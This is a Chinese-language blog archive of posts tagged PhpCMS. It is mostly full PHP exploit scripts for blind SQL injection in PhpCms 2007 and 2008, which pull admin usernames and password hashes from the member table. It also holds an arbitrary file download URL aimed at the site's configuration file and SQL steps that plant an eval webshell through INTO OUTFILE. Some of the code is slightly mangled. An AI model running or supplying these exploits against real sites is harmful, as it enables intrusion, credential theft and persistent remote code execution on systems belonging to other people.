PhpCMS | Chinadu's Blog

存档

文章标签 ‘PhpCMS’

PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

2010年5月8日 Chinadu 没有评论 164 views

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 1:

$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 2:

$query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 3:

$query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

$time_a = time();

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

$time_b = time();

fclose($conn);

//echo $time_b - $time_a."\r\n";

if ($time_b - $time_a > 4)

return true;

else

return false;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 0;

$chr = 0;

while ($exit==0)

{

if (exploit($hostname, $path, $pos, $chr, $chs))

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path)

{

echo "[+] prefix: ";

$conn = fsockopen($hostname, 80);

$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";

$request .= "Host: {$hostname}\r\n";

$request .= "Connection: Close\r\n\r\n";

fputs($conn, $request);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("Exploit failed");

}

?>

分类: 矩阵毒刺标签: Exploit, PhpCMS, SQL Injection

PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)

2010年5月8日 Chinadu 没有评论 158 views

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 0:

$query = "#";

break;

case 1:

$query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 2:

$query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 3:

$query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

//print_r($conn);

/*if (!$conn){

exit("\r\n[-] No response from $conn");

}*/

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

return $reply;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 1;

$chr = 0;

while ($exit==0)

{

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path, $chs)

{

echo "[+] prefix: ";

$pos = 0;

$chr = 0;

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match('/FROM `(.+)yp_product/ie',$response,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path, 0);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("\r\n[-] Exploit failed");

}

?>

分类: 矩阵毒刺标签: Exploit, PhpCMS, SQL Injection

phpcms 2008 任意下载漏洞

2009年10月27日 Chinadu 1 条评论 425 views

漏洞文件download.php

PHP代码：

< ?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //注意!!
if(emptyempty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k);

if(isset($i)) $downid = intval($i);
if(!isset($m)) showmessage($LANG['illegal_parameters']);
if(emptyempty($f)) showmessage('地址失效');
if(!$i || $m<0) showmessage($LANG['illegal_parameters']);
if(!isset($t)) showmessage($LANG['illegal_parameters']);
if(!isset($ip)) showmessage($LANG['illegal_parameters']);
$starttime = intval($t);

$fileurl = trim($f);
if(!$downid || emptyempty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != IP) showmessage($LANG['illegal_parameters']);

$endtime = TIME - $starttime;
if($endtime > 3600) showmessage('地址失效');
if($m) $fileurl = trim($s).trim($fileurl);

if(strpos($fileurl, '://'))//远程文件
{
header("Location: $fileurl");
}
else//本地文件
{
if($d == 0)
{
header("Location: ".SITE_URL.$fileurl);
}
else
{
$fileurl = file_exists($fileurl) ? stripslashes($fileurl) : PHPCMS_ROOT.$fileurl;//此处可能为物理路径
$filename = basename($fileurl);
if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl))//处理中文文件
{
$filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
$filename = urldecode(basename($filename));
}
file_down($fileurl, $filename);
}
}
?>

function file_down($filepath, $filename = '')
{
if(!$filename) $filename = basename($filepath);
if(is_ie()) $filename = rawurlencode($filename); $filetype = fileext($filename);
$filesize = sprintf("%u", filesize($filepath));
if(ob_get_length() !== false) @ob_end_clean();
header('Pragma: public');
header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: pre-check=0, post-check=0, max-age=0');
header('Content-Transfer-Encoding: binary');
header('Content-Encoding: none');
header('Content-type: '.$filetype);
header('Content-Disposition: attachment; filename="'.$filename.'"');
header('Content-length: '.$filesize);
readfile($filepath);
exit;

其实$i,$m,$f,$ip等都是地址栏的参数没有过滤(在down.php中可以看到)由parse_str($a_k)解释后得到的,又由于$a_k 是经phpcms_auth($a_k, 'DECODE', AUTH_KEY)解密后才能得到参数,但我本地测试构造$a_k变量的加密值不成功就换了个方法,把$a_k构造成不存在的参数然后下面的$i,$m,$f,$ip我就直接从地址栏中添加!测试如下:

http://www.xxxx.cn/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=119.123.178.19&s=m/&d=1

分类: 技术文章标签: PhpCMS

phpcms2008 最新0day & Exp

2009年9月20日 Chinadu 没有评论 151 views

来源:My5t3ry

漏洞存在于yp/job.php的17-34行，urldecode函数惹的祸，代码如下：

PHP代码：

switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0;
$where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;

exp：

PHP代码

if ($argc != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage ()
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." ".
"\n[+] Ex. : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

preg_match ("/(.+)< \/span>/", $outcode, $x);

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

$query = "x%2527";

$outcode = request ($hostname, $path, $query);

preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);

$prefix=$match[1];

//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";

if ($match[1]) {

echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";
}

else {
die(" Exploit failed...");
}

echo "[~]trying to get username length...\n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

$i++;

preg_match ("/(.+)< \/span>/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}

if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}

$length=$i-1;
echo "[+]length -> ".$length;

// return $length;
//}

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos < = $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos < = 24)
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";

?>

分类: 技术文章标签: 0day, PhpCMS

PHPCMS2008 拿webshell

2008年11月16日 Chinadu 没有评论 362 views

进去后:

Create TABLE b (cmd text NOT NULL);

Insert INTO b (cmd) VALUES('<?php @eval($_POST[cmd]);?>');

//在字段cmd中插入一句话木马，木马内容为

<?php @eval($_POST[cmd]);?>

前3句都尅执行成功最后一句执行后显示空白

select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';

分类: 技术文章标签: PhpCMS, 小技巧

PhpCms2007 sp6 SQL injection 0day (wenba)

2008年11月10日 Chinadu 没有评论 79 views

早前在phpcms 0day频发的时候写的这个exp，藏着这个exp藏了一个多月吧，也没有拿它去打站，一直丢在我硬盘里，今天看到11期的黑防公布了，于是我也丢出来吧：

<? print_r(' -------------------------------------------------------------------------------- Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit BY oldjun[S.U.S](http://www.oldjun.com) -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; }


function sendpacketii($packet)

{

global  $host, $html;

$ock=fsockopen(gethostbyname($host),'80');

if (!$ock) {

echo 'No response from '.$host; die;

}

fputs($ock,$packet);

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}
$host=$argv[1];

$path=$argv[2];

$prefix="phpcms_";

$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))

{echo "Error... check the path!\r\n\r\n"; die;}
/*get   $prefix*/

$packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: ".$cookie."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

//echo $html;

if (eregi("in your SQL syntax",$html))

{

$temp=explode("FROM ",$html);

if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}

if($temp2[0])

$prefix=$temp2[0];

echo "[+]prefix -> ".$prefix."\r\n";

}

echo "[~]exploting now,plz waiting...\r\n\r\n";
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n"; die;}
$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(97,102));//a-f letters

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$chars))

{

$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;}

}

if ($i==255) {die("Exploit failed...");}

}

$j++;

}

$j=1;$username=""; while (!strstr($username,chr(0))) { for ($i=0; $i<=255; $i++) { $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\r\n";break;} if ($i==255) {die("Exploit failed...");} } $j++; } print_r(' -------------------------------------------------------------------------------- [+]username -> '.$username.' [+]password(md5 32λ) -> '.$password.' -------------------------------------------------------------------------------- '); function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?>

分类: 技术文章标签: PhpCMS

PHPCMS2007 SP6 vote模块SQL注射漏洞

2008年9月16日 Chinadu 没有评论 42 views

作者：Ryat
来源：狼族论坛

好久没在论坛发什么东西了，今天中秋满月，发个小漏洞:)

漏洞代码：

vote/vote.php// 22行$optionids = is_array($op) ? implode(',',$op) : $op;...$db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number+1 WHERE optionid IN ($optionids) ");

漏洞很明显，没什么好说的，其他地方也有类似的问题，有兴趣的同学可以跟下，下面给个poc性质的exp[由于是盲注，效果不是很好]:p
代码:

#!/usr/bin/php<?phpprint_r('+---------------------------------------------------------------------------+Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploitby puret_tmail: puretot at gmail dot comteam: http://www.wolvez.orgdork: "Powered by Phpcms 2007"+---------------------------------------------------------------------------+');/*** works regardless of php.ini settings*/if ($argc < 3) {print_r('+---------------------------------------------------------------------------+Usage: php '.$argv[0].' host pathhost:      target server (ip/hostname)path:      path to phpcmsExample:php '.$argv[0].' localhost /phpcms/+---------------------------------------------------------------------------+');exit;}error_reporting(7);ini_set('max_execution_time', 0);$host = $argv[1];$path = $argv[2];$benchmark = 100000000;$timeout = 10;$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat%23';$resp = send();preg_match('/([a-z0-9]+)_vote_option/', $resp, $pre);if ($pre) {echo "Plz Waiting...\n";/*** get admin password*/$j = 1;$pass = '';$hash[0] = 0; //null$hash = array_merge($hash, range(48, 57)); //numbers$hash = array_merge($hash, range(97, 102)); //a-f letterswhile (strlen($pass) < 32) {for ($i = 0; $i <= 255; $i ++) {if (in_array($i, $hash)) {$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';send();usleep(2000000);$starttime = time();send();$endtime = time();$difftime = $endtime - $starttime;if ($difftime > $timeout) {$pass .= chr($i);echo chr($i);break;}}if ($i == 255)exit("\nExploit Failed!\n");}$j ++;}echo "\t";/*** get admin username*/$j = 1;$user = '';while (strstr($user, chr(0)) === false) {for ($i = 0; i <= 255; $i ++) {$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';send();usleep(2000000);$starttime = time();send();$endtime = time();$difftime = $endtime - $starttime;if ($difftime > $timeout) {$user .= chr($i);echo chr($i);break;}if ($i == 255)exit("\nExploit Failed!\n");}$j ++;}exit("Expoilt Success!\nadmin:\t$user\nPassword(md5):\t$pass\n");} elseexit("Exploit Failed!\n");function send(){global $host, $path, $cmd;$message = "POST ".$path."vote/vote.php  HTTP/1.1\r\n";$message .= "Accept: */*\r\n";$message .= "Accept-Language: zh-cn\r\n";$message .= "Content-Type: application/x-www-form-urlencoded\r\n";$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";$message .= "CLIENT-IP: ".time()."\r\n";$message .= "Host: $host\r\n";$message .= "Content-Length: ".strlen($cmd)."\r\n";$message .= "Connection: Close\r\n\r\n";$message .= $cmd;$fp = fsockopen($host, 80);fputs($fp, $message);$resp = '';while ($fp && !feof($fp))$resp .= fread($fp, 1024);return $resp;}?>

分类: 技术文章标签: PhpCMS

Chinadu's Blog

存档

PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)

phpcms 2008 任意下载漏洞

phpcms2008 最新0day & Exp

PHPCMS2008 拿webshell

PhpCms2007 sp6 SQL injection 0day (wenba)

PHPCMS2007 SP6 vote模块SQL注射漏洞

About Me

站内搜索

日历

最新文章

热门文章

近期评论

文章归档

Categories

Blogroll

Archives

2012 年二月
一	二	三	四	五	六	日
« 一
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29